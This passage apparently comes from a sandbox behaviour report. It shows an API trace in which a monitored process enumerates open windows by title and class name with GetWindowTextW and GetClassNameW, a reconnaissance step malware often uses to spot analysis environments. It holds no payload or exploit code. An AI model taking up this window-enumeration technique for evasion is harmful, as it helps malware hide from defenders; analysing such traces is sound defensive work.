(in: hWnd=0x20214, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0140.134] GetWindowTextW (in: hWnd=0x1026c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Story Police") returned 12 [0140.134] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0140.134] GetWindowTextW (in: hWnd=0x1026a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Include Effect Seven") returned 20 [0140.134] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0140.134] GetWindowTextW (in: hWnd=0x10268, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Serve") returned 5 [0140.135] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0140.135] GetWindowTextW (in: hWnd=0x10260, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Weapon Natural") returned 14 [0140.135] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0140.135] GetWindowTextW (in: hWnd=0x10266, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Camera") returned 6 [0140.135] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0140.135] GetWindowTextW (in: hWnd=0x10262, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nothing Foreign") returned 15 [0140.135] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0140.136] GetWindowTextW (in: hWnd=0x10264, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Move") returned 4 [0140.136] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0140.136] GetWindowTextW (in: hWnd=0x40200, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Arrive") returned 6 [0140.136] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0140.140] GetWindowTextW (in: hWnd=0x1025c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Throw Toward Purpose") returned 20 [0140.140] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0140.140] GetWindowTextW (in: hWnd=0x10244, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Factor Western Forget") returned 21 [0140.140] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0140.141] GetWindowTextW (in: hWnd=0x1022e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Clear") returned 5 [0140.141] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0140.141] GetWindowTextW (in: hWnd=0x10222, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Watch") returned 5 [0140.141] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0140.141] GetWindowTextW (in: hWnd=0x10230, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Who South") returned 9 [0140.142] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0140.142] GetWindowTextW (in: hWnd=0x10226, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Raise Left Buy") returned 14 [0140.142] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0140.142] GetWindowTextW (in: hWnd=0x10218, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Knowledge Sign") returned 14 [0140.143] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0140.143] GetWindowTextW (in: hWnd=0x1020e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drop") returned 4 [0140.143] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0140.143] GetWindowTextW (in: hWnd=0x1020c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="That But") returned 8 [0140.143] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0140.143] GetWindowTextW (in: hWnd=0x10206, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Claim") returned 5 [0140.144] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0140.144] GetWindowTextW (in: hWnd=0x10204, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Quite Do") returned 8 [0140.144] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0140.144] GetWindowTextW (in: hWnd=0x30122, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.144] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.145] GetWindowTextW (in: hWnd=0x30036, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.145] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.145] GetWindowTextW (in: hWnd=0x3003e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.145] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0140.145] GetWindowTextW (in: hWnd=0x30070, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.145] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0140.146] GetWindowTextW (in: hWnd=0x201e0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0140.146] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0140.146] GetWindowTextW (in: hWnd=0x401f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.146] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0140.146] GetWindowTextW (in: hWnd=0x30288, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.146] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.147] GetWindowTextW (in: hWnd=0x30126, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0140.147] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0140.147] GetWindowTextW (in: hWnd=0x2012c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.147] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0140.147] GetWindowTextW (in: hWnd=0x20084, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.147] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0140.148] GetWindowTextW (in: hWnd=0x301fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.148] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.148] GetWindowTextW (in: hWnd=0x201fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.148] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.148] GetWindowTextW (in: hWnd=0x101be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.149] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0140.149] GetWindowTextW (in: hWnd=0x101b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.149] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.149] GetWindowTextW (in: hWnd=0x101aa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0140.149] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0140.149] GetWindowTextW (in: hWnd=0x101a6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.150] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.150] GetWindowTextW (in: hWnd=0x101a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0140.151] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0140.151] GetWindowTextW (in: hWnd=0x1018e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0140.151] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0140.152] GetWindowTextW (in: hWnd=0x10110, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.153] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.153] GetWindowTextW (in: hWnd=0x10118, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.154] GetClassNameW (in: hWnd=0x10118, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0140.154] GetWindowTextW (in: hWnd=0x20152, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.155] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.155] GetWindowTextW (in: hWnd=0x1019a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.155] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.155] GetWindowTextW (in: hWnd=0x10116, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.156] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0140.156] GetWindowTextW (in: hWnd=0x1010e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.156] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0140.156] GetWindowTextW (in: hWnd=0x100f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.157] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.157] GetWindowTextW (in: hWnd=0x100f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Push Notifications Platform") returned 35 [0140.157] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0140.157] GetWindowTextW (in: hWnd=0x100ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0140.157] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0140.157] GetWindowTextW (in: hWnd=0x100ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.157] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0140.157] GetWindowTextW (in: hWnd=0x100e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.157] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.158] GetWindowTextW (in: hWnd=0x100e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.158] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.158] GetWindowTextW (in: hWnd=0x200da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.158] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.158] GetWindowTextW (in: hWnd=0x100c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.158] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0140.158] GetWindowTextW (in: hWnd=0x702b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.159] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0140.159] GetWindowTextW (in: hWnd=0x20040, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0140.159] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0140.159] GetWindowTextW (in: hWnd=0x2001c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0140.159] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0140.159] GetWindowTextW (in: hWnd=0x20030, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Shell Experience Host") returned 29 [0140.159] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0140.160] GetWindowTextW (in: hWnd=0x2002e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.161] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0140.162] GetWindowTextW (in: hWnd=0x40038, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.162] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.162] GetWindowTextW (in: hWnd=0x101cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.162] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.163] GetWindowTextW (in: hWnd=0x101c8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.163] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0140.163] GetWindowTextW (in: hWnd=0x100ac, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.163] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0140.163] GetWindowTextW (in: hWnd=0x10078, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.163] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0140.163] GetWindowTextW (in: hWnd=0x10074, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.164] GetClassNameW (in: hWnd=0x10074, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0140.164] GetWindowTextW (in: hWnd=0x10022, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0140.164] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0140.164] GetWindowTextW (in: hWnd=0x2002a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.164] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0140.164] GetWindowTextW (in: hWnd=0x3035e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.165] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0140.165] GetWindowTextW (in: hWnd=0x100d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0140.165] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0140.165] GetWindowTextW (in: hWnd=0x1012a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.165] GetClassNameW (in: hWnd=0x1012a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.165] GetWindowTextW (in: hWnd=0x100ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0140.165] GetClassNameW (in: hWnd=0x100ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0140.166] GetWindowTextW (in: hWnd=0x10082, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.166] GetClassNameW (in: hWnd=0x10082, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.166] GetWindowTextW (in: hWnd=0xb031c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.166] GetClassNameW (in: hWnd=0xb031c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.166] GetWindowTextW (in: hWnd=0x601d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.166] GetClassNameW (in: hWnd=0x601d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.166] GetWindowTextW (in: hWnd=0x103a0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.167] GetClassNameW (in: hWnd=0x103a0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.167] GetWindowTextW (in: hWnd=0x1039e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.167] GetClassNameW (in: hWnd=0x1039e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.167] GetWindowTextW (in: hWnd=0x1039c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.167] GetClassNameW (in: hWnd=0x1039c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.167] GetWindowTextW (in: hWnd=0x1039a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.168] GetClassNameW (in: hWnd=0x1039a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.168] GetWindowTextW (in: hWnd=0x20224, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.168] GetClassNameW (in: hWnd=0x20224, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.168] GetWindowTextW (in: hWnd=0x10398, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.168] GetClassNameW (in: hWnd=0x10398, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.169] GetWindowTextW (in: hWnd=0x10394, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.169] GetClassNameW (in: hWnd=0x10394, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.169] GetWindowTextW (in: hWnd=0x10392, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.169] GetClassNameW (in: hWnd=0x10392, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.169] GetWindowTextW (in: hWnd=0x10390, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.169] GetClassNameW (in: hWnd=0x10390, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.170] GetWindowTextW (in: hWnd=0x10388, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.170] GetClassNameW (in: hWnd=0x10388, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.170] GetWindowTextW (in: hWnd=0x10386, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.170] GetClassNameW (in: hWnd=0x10386, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.170] GetWindowTextW (in: hWnd=0x10384, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.171] GetClassNameW (in: hWnd=0x10384, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.171] GetWindowTextW (in: hWnd=0x10382, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.171] GetClassNameW (in: hWnd=0x10382, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.171] GetWindowTextW (in: hWnd=0x2021a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.171] GetClassNameW (in: hWnd=0x2021a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.171] GetWindowTextW (in: hWnd=0x10380, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.171] GetClassNameW (in: hWnd=0x10380, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.246] GetWindowTextW (in: hWnd=0x1037e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.246] GetClassNameW (in: hWnd=0x1037e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.246] GetWindowTextW (in: hWnd=0x1037c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.246] GetClassNameW (in: hWnd=0x1037c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.246] GetWindowTextW (in: hWnd=0x1037a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.247] GetClassNameW (in: hWnd=0x1037a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.247] GetWindowTextW (in: hWnd=0x10378, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.247] GetClassNameW (in: hWnd=0x10378, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.247] GetWindowTextW (in: hWnd=0x10376, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.247] GetClassNameW (in: hWnd=0x10376, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.247] GetWindowTextW (in: hWnd=0x10374, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.248] GetClassNameW (in: hWnd=0x10374, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.248] GetWindowTextW (in: hWnd=0x10372, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.248] GetClassNameW (in: hWnd=0x10372, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.248] GetWindowTextW (in: hWnd=0x10370, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.248] GetClassNameW (in: hWnd=0x10370, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.248] GetWindowTextW (in: hWnd=0x1036e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.249] GetClassNameW (in: hWnd=0x1036e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.249] GetWindowTextW (in: hWnd=0x1036c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.249] GetClassNameW (in: hWnd=0x1036c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.249] GetWindowTextW (in: hWnd=0x10368, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.249] GetClassNameW (in: hWnd=0x10368, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.249] GetWindowTextW (in: hWnd=0x10362, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.250] GetClassNameW (in: hWnd=0x10362, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.250] GetWindowTextW (in: hWnd=0x10360, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.250] GetClassNameW (in: hWnd=0x10360, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.250] GetWindowTextW (in: hWnd=0x1035a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.250] GetClassNameW (in: hWnd=0x1035a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.250] GetWindowTextW (in: hWnd=0x10358, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.250] GetClassNameW (in: hWnd=0x10358, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.251] GetWindowTextW (in: hWnd=0x10356, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.251] GetClassNameW (in: hWnd=0x10356, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.251] GetWindowTextW (in: hWnd=0x10354, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.251] GetClassNameW (in: hWnd=0x10354, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.251] GetWindowTextW (in: hWnd=0x10352, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.251] GetClassNameW (in: hWnd=0x10352, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.252] GetWindowTextW (in: hWnd=0x10350, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.252] GetClassNameW (in: hWnd=0x10350, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.252] GetWindowTextW (in: hWnd=0x1034e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.252] GetClassNameW (in: hWnd=0x1034e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.252] GetWindowTextW (in: hWnd=0x1034c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.253] GetClassNameW (in: hWnd=0x1034c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.253] GetWindowTextW (in: hWnd=0x1034a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.253] GetClassNameW (in: hWnd=0x1034a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0140.253] GetWindowTextW (in: hWnd=0x10348, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0140.253] GetClassNameW (in: hWnd=0x10348, lpClassName=0x7df1a8, nMaxCount=1024 | out: 